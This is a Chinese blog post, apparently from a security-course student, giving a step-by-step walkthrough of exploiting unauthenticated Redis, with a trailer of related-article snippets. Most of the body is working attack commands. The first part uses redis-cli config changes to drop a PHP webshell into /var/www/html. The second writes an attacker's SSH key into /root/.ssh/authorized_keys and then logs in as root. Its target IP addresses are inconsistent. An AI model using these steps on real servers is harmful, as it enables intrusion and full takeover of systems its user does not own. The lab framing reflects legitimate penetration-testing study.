Redis未授权访问漏洞的利用

最新推荐文章于 2022-09-28 15:42:32 发布
最新推荐文章于 2022-09-28 15:42:32 发布
阅读量171 收藏
点赞数
分类专栏: 网络安全 内网渗透 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103984370
版权
本文详细介绍了两种Redis未授权访问的利用方法:一是通过Redis写入webshell,实现远程代码执行;二是结合SSH key文件,将公钥写入目标机器的authorized_keys,进而实现免密登陆。
摘要由CSDN通过智能技术生成

1、利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save
在这里插入图片描述
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述

可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述

2、Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述

看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
在这里插入图片描述

然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
在这里插入图片描述

然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
在这里插入图片描述

然后去目标机看一下是否生成
在这里插入图片描述

然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133
在这里插入图片描述

2646692244领取学习资料及工具联系管理员,学习可以进群773617250与大家学习交流!

                                                  BY易锦教育正式班学员墨森
L18296069161
关注
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权漏洞环境搭建复现问题解决
身高两米不到的博客
03-17 695
一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下 环境VMware,两台主机使用NAT模式连接 Kali 192.168.209.129 CentOS7 192.168.209.128 二:CentOS搭建redis,以root权限开启虚机 (1).下载安装包 wget http://download.redis.io/releases/redis-4.0.6.tar.gz 解压 tar -zxvf redis-4.0.6.tar.gz (2).red
Redis漏洞【总结】授权访问复现与利用
qq_45300786的博客
04-20 1466
【Linux】安装httpd+php 一、安装redis服务 kali:192.168.100.23 靶机(centos):192.168.100.20 靶机(centos)安装redis服务 wget http://download.redis.io/releases/redis-2.8.17.tar.gz (如果下载不下来的话:http://distfiles.macports.org/redis/) 解压安装包:tar xzf redis-2.8.17.tar.gz 进入redis目录:cd r
redis利用总结
qq_56426046的博客
09-28 1222
kali安装redis-clikali监听9999端口远程访问不了把protected-mode改成no另一种代码形式。
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2311
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
Redis授权最全利用方式
swordheart的博客
01-10 2569
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
本文主要涉及的是网络安全领域中的一个常见问题,即如何利用Redis授权访问漏洞进行提权。Redis是一款开源的、高性能的键值数据库,常用于数据缓存和快速数据处理。当Redis配置不当,允许授权的外部访问时,攻击...
Redis授权如何访问漏洞
L18296069161的博客
01-17 110
1、利用redis写webshell 在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容 在浏览器中...
Linux系统CentOS 7修改httpd服务Apache网站根目录/var/www/html
热门推荐
雨打芭蕉的博客
04-01 4万+
本文基于阿里云服务器CentOS7.4 讲述,如果文中有错误或者不足,敬请在评论区指出昨天我写了一篇博客讲述CentOS 7安装部署httpd服务,在安装部署好httpd服务后,访问公网IP可以正常访问,默认Apache网站根目录/var/www/html,如果我们要修改为自定义的目录路径怎么办呢?1、执行vim /etc/httpd/conf/httpd.conf指令键盘输入E,进人可编辑模式2...
Redis利用方式总结(Linux/Windows)
J0o1ey Blog
05-24 1946
简述 本文收录整理了https://xz.aliyun.com/t/7940 https://www.redmango.top/article/51 等文章 感谢作者们无私分享利用redis优秀姿势,整理后方便大家查阅 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务
redis
chibazhen9407的博客
02-24 811
Redis介绍 • Redis和Memcached类似,也属于k-v数据存储 • Redis官网redis.io •支持更多value类型,除了和string外,还支持hash、lists(链表)、sets(集合)和sorted sets(有序集合) • redis使用了两种文件格式...
Redis持久化机制介绍
拓拓的博客
04-15 336
Redis支持RDB和AOF两种持久化机制,持久化可有效避免因进程退出造成的数据丢失问题。 5.1 RDB RDB持久化是把当前进程数据生成快照保存到硬盘的过程,触发RDB过程分为手动触发和自动触发。 5.1.1 触发机制 手动触发分别对应save和bgsave命令: save命令:阻塞当前Redis服务器,直到RDB过程完成为止,对内存较大的实例会造成长时间阻塞,线上...
redis中关于config get、config set与config rewrite
wukong_666的博客
07-22 6148
redis服务器在启动的时候所有参数的设定都是通过缺省或指定的配置文件获取,在这些参数中有些在服务器启动后是无法修改的,但是有些参数则可以通过redis提供的config get和config set实时地获取和修改。 我们可以通过在客户端执行“config get *”这个命令查看参数。 我们可以通过在客户端执行“config set”这个命令来实时修改参数。 但是,用“confi
SSRF漏洞
m0_65041566的博客
05-28 373
SSRF 服务器端请求伪造,攻击目标一般是从外网无法访问的内部系统 成因 服务器提供,从其他服务器获取资源,但没有对目标地址进行过滤,而大多数web构架中的服务器可以访问内网资源 利用方法 扫描内网ip,端口,以及主机的存活状况,获取banner(主机信息) 进行内网服务 攻击内网web服务 利用file协议读取数据 出现位置 社交共享功能:如分享的超链接 转码服务 在线翻译 图片文章的下载,保存 。。。。 相关函数 file_get_contents() 将文件或url所
redis持久化RDB和AOF
weixin_30576859的博客
07-04 1307
Redis 持久化: 提供了多种不同级别的持久化方式:一种是RDB,另一种是AOF. RDB 持久化可以在指定的时间间隔内生成数据集的时间点快照(point-in-time snapshot)。 AOF 持久化记录服务器执行的所有写操作命令,并在服务器启动时,通过重新执行这些命令来还原数据集。 AOF 文件中的命令全部以 Redis 协议的格式来保存,新命令会被追加到文件的末尾。 Redis...
Redis授权漏洞利用
tangshuangsss的专栏
01-04 634
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值